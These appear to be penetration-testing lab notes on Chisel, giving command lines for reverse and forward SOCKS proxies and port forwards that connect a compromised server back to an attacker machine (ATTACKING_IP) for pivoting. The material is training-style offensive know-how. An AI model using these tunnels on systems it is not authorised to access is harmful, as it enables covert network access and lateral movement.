https://github.com/jpillora/chisel is a tunneled proxy and port forwarding without needing SSH.
https://github.com/jpillora/chisel/releases
To use https://github.com/jpillora/chisel we need a copy of it on both the attacker and the relay, the tool offers two menu client and server chisel client|server --help
This connects back from a compromised server to a listener waiting on our attacking machine.
./chisel server -p LISTEN_PORT --reverse
./chisel client ATTACKING_IP:LISTEN_PORT R:socks &
./chisel server -p LISTEN_PORT --socks5
./chisel client TARGET_IP:LISTEN_PORT PROXY_PORT:socks
<aside>
💡 When sending data through either of these proxies, we would need to set the port in our proxychains configuration. As Chisel uses a SOCKS5
proxy, we will also need to change the start of the line from socks4 to socks5:
</aside>
A remote port forward is when we connect back from a compromised target to create the forward.
./chisel server -p LISTEN_PORT --reverse &
Here the LISTEN_PORT is the port that we started the chisel server on, and the LOCAL_PORT is the port we wish to open on our own attacking machine to link with the desired target port.
./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT &
As with SSH, a local port forward is where we connect from our own attacking machine to a chisel server listening on a compromised target.
./chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT
./chisel server -p LISTEN_PORT